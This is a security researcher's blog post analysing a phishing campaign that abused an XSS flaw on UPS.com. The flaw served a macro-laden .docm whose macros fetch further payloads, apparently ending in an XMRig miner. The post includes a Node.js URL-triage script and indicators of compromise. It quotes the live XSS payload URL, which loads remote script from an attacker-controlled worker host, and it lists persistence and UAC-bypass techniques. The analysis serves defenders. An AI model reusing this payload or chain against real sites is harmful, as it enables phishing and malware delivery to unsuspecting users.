Let's talk about one of the most creative phishing campaigns I have ever seen to date. In attacker jargon, this sequenced fence hopping is known as building a full exploit chain: combining multiple vulnerabilities into a chain of attack that ends with the attacker in a privileged position on the targeted system.


Since Covid-19 began, deliveries have surged drastically. Whether it is grocery shopping or something you have ordered, we all receive many parcels from various couriers. It is more common than before to receive text or e-mail notifications regarding status updates for your delivery. This could turn out badly, with a high chance of being phished, especially if you are already waiting on a delivery.

This phishing campaign is the most realistic because it leveraged a Cross-Site Scripting (XSS) vulnerability that existed in one of the couriers' websites (UPS). In this case, it enabled attackers to modify the page contents, turning the page into a legitimate-looking download page by injecting malicious HTML and JavaScript code.

This vulnerability allowed the attacker to distribute a weaponised document (docm) through a remote CloudFlare worker but make it appear as though it was being downloaded directly from UPS.com.

When the document is downloaded and enabled, the macros will attempt to retrieve the next payload hosted on a 2nd domain controlled by the threat actor. At this stage it is uncertain what the final payload is supposed to do. The sky is the limit - Ransomware? Spyware? Botnet? We'll see.

The phishing campaign was first discovered on Aug 23, 2021, by security researcher Daniel Gallagher.

Dissecting the UPS phishing scam

Screenshots of the e-mail:

This is a decent 1:1 attempt at the template! No spelling mistakes or weird hidden "Click here" URLs. Going back to my title, here is why I said "Almost": the email senders were not very convincing, however they were good enough to pass SPF and DKIM protection, and because the campaign leveraged XSS it did not break TLS validation: [email protected]
That is the sender as per Daniel's screenshots; however, I found another attempt coming from [email protected]. The email sender is always the same one, "unitedparcelservice", and the domains were random. Since both are using WordPress as the main content management system, it is safe to assume that they were perhaps using weak passwords or out-of-date builds/plugins, were hacked, and that this allowed the attacker to send bulk e-mails from their servers.
The tracking number links to the vulnerable XSS URL on the UPS.com website. This downloads a malicious document, pretending to be an invoice.
Let's have a look at the URL in question.

The email headers:

Sending address: unitedparcelservice @ paradanta[.]com
SMTP server: 212.227.126[.]134 / mout.kundenserver[.]de


Url Encoded:

Url Decoded:
https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&service=standard_delivery&xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==&loc=en_US"><img src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

Tidying up more:
https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&service=standard_delivery&xref=useless&loc=en_US"><img src="x" onerror="Function(atob('$.getScript('https://m.media-amazon.workers.dev/js')'))()

Another base64 encoded string in the xref parameter that decodes to: 1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;).

Super interesting: the threat actor was kind and left a comment in the base64 string that explains this string's purpose, which is to hide the query parameter that is appended at the end of the URL. Because the URL is so long, browsers will not show all of it, and since the malicious XSS injection is at the end of the URL, we can't see it.

XSS payload is executed right after the loc parameter and is: <img src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

And yet another base64 string, which decodes to $.getScript('https://m.media-amazon.workers.dev/js'); this is the worker script that gets loaded in the UPS page. The <img src> XSS payload is quite common, so nothing fancy there. The atob() function decodes a string of data that has been encoded using Base64 encoding. This function is commonly used to steal cookies, to bypass black-lists and typically for blind XSS injections.
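
The decoding steps above can be automated when triaging links from a mail gateway or proxy log. The following is an added example, not code from the campaign or from the original post: it runs on Node.js, SAMPLE is the URL quoted above, and the function names (triageUrl, decodeLayers) and finding labels are assumptions made for illustration.

```javascript
// Added example (Node.js, no dependencies). SAMPLE is the URL quoted in the article.
const SAMPLE =
  'https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&service=standard_delivery' +
  '&xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3' +
  'IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==' +
  '&loc=en_US"><img src="x" onerror="Function(atob(\'' +
  'JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ==\'))()';

const MARKUP = /<\s*(img|script|svg|iframe)\b|\bon\w+\s*=|javascript:/i;
const B64_RUN = /[A-Za-z0-9+\/]{16,}={0,2}/g;

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; } // keep malformed escapes as-is
}

// Base64-decode a candidate; keep it only if every byte is printable ASCII or whitespace.
function decodeIfText(candidate) {
  const buf = Buffer.from(candidate, 'base64');
  const printable = (b) => (b >= 0x20 && b <= 0x7e) || b === 9 || b === 10 || b === 13;
  return buf.length > 0 && buf.every(printable) ? buf.toString('latin1') : null;
}

// Peel nested base64 layers (bounded depth) and return each decoded text.
function decodeLayers(value, depth = 0, out = []) {
  if (depth >= 3) return out;
  for (const run of value.match(B64_RUN) || []) {
    const text = decodeIfText(run);
    if (text !== null) { out.push(text); decodeLayers(text, depth + 1, out); }
  }
  return out;
}

function triageUrl(raw) {
  const url = new URL(raw); // throws on input that is not a URL at all
  const findings = [];
  // Split the query by hand: URLSearchParams would turn a base64 "+" into a space.
  for (const pair of url.search.slice(1).split('&').filter(Boolean)) {
    const eq = pair.indexOf('=');
    const param = safeDecode(eq < 0 ? pair : pair.slice(0, eq));
    const value = safeDecode(eq < 0 ? '' : pair.slice(eq + 1));
    if (MARKUP.test(value)) findings.push({ param, issue: 'markup', offset: safeDecode(raw).search(MARKUP) });
    for (const text of decodeLayers(value)) {
      const hosts = [...text.matchAll(/https?:\/\/([^\s\/'":)]+)/gi)].map((m) => m[1].toLowerCase());
      const foreign = hosts.filter((h) => h !== url.hostname);
      findings.push({ param, issue: foreign.length ? 'remote-script' : 'encoded-text', text, foreign });
    }
  }
  return findings;
}
```

The offset in the markup finding shows how far into the URL the injection starts, which is the effect the xref padding was added to achieve.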

CloudFlare Worker Script

The above script will modify the UPS page to display a message that a file will be downloaded.

UPS XSS Downloading

This approach is truly what makes this campaign stand out. Victims of this campaign might be tricked into opening the invoice with less suspicion, thinking it is a genuine file from UPS.

The mysterious fake 'Invoice' document

In the above worker script, there is another URL in the parameter named downloadUrl. This was available at https://m.media-amazon.workers[.]dev/documents/invoice_1Z7301XR1412220178

Malicious Phishing Document

The downloaded document is named 'invoice_1Z7301XR1412220178.docm' and claims to be a shipping invoice from UPS. Pay attention to the extension '.docm'. The macro names were "Hehehe" and "hahahah".

Phishing Document Macros

DOCM files are documents generated by Microsoft Word 2007 or higher with the ability to run macros. The format is similar to DOCX, but the ability to run macros makes it different. Like DOCX, DOCM files can store text, images, tables, shapes, charts and other contents. The capability to run macros makes it easy to save time by executing a series of commands, in the form of recorded actions, for the automatic completion of a task. DOCM files can be opened and edited in Microsoft Word 2007 and above.

Once enabled, the macros within the document will attempt to download another file that was located at https://divine-bar-3d75.visual-candy.workers[.]dev/blackhole.png.

This appears to be an image file, but is it?
This file was disguised as a picture (png format) and it's the first payload to be downloaded. It is very common for advanced threat actors to split their payloads into smaller chunks to avoid downloading large files; they also use random timeouts between downloading and execution of these scripts. This helps in avoiding detection by antiviruses. Typically you see an obfuscated PowerShell script that retrieves more files that make up a final payload.

After some more digging, I stumbled on another CloudFlare domain that hosts more instructions to be executed on the victim's machine. This was available at: https://cdn.globalsigncdn.workers[.]dev

This sample contains so many TTPs:
- Normal.dotm (persistence)
- Run key to launch Normal.dotm via PS (persistence) by winword
- Task scheduler to launch PS by winword
- WMI persistence, COM hijack and UAC bypass via SilentCleanup task

The final payload "appears" to be linked to xmrig and its purpose is cryptojacking.

Cryptojacking is a slow and tedious way to generate illicit income; that's why the actor is using a botnet to infect as many devices as possible. Owning multiple systems for mining is not cheap, so attackers try the next best thing: to remotely compromise devices and use them for mining instead.

XMRig is a miner, specifically a type of threat used to make money at the expense of computer users by using their infected computers to mine Monero, a cryptocurrency. XMRig can cause a computer to overheat and perform badly, since it uses additional system resources, taking these away from the victim.

Final Payload.

We can see they are using the RandomX algorithm.

RandomX is the name of the new mining algorithm for Monero, the privacy coin whose objective is to keep the network protected from ASIC mining, allowing only mining per CPU.


This phishing campaign illustrates the creativity and evolving techniques used by threat actors to distribute weaponised files convincingly.

While the e-mail sender was a suspicious domain, the XSS vulnerability was actively exploited to make it appear as if the invoices were legitimately downloaded from UPS, so many people would have fallen for this scam. But did they?

That's a story for another article, perhaps if I can find where the mining workers are connecting and monitor that mining pool, I could come back with some statistics e.g. infection rate, money generated, time frame for this campaign. Game on!

I don't believe this to be an APT gang; however, the chaining of vulnerabilities from an offensive security perspective was pretty ingenious.

I will continue digging for more information to find the source of this attack. If I find anything new, I will update my blog post.
The UPS.com Cross-Site Scripting vulnerability has since been fixed.

Hash1: 841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432

Hash2: ae1123c24bb52dce5ec0f0a6c947785012702dc7c3339188baee917721351ff5

Main hosts: cdn.globalsigncdn.workers[.]dev


Virus Total Scan

INVOICE_1Z7301XR1412220178.docm (MD5: 8EC2C162D57A426A32E27745D9854F93) - Interactive analysis - ANY.RUN
AnyRun Interactive analysis of infected document
divine-bar-3d75.visual-candy.workers.dev - urlscan.io
Suspicious URL Analysis

Have you got any suggestions or questions for me? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.
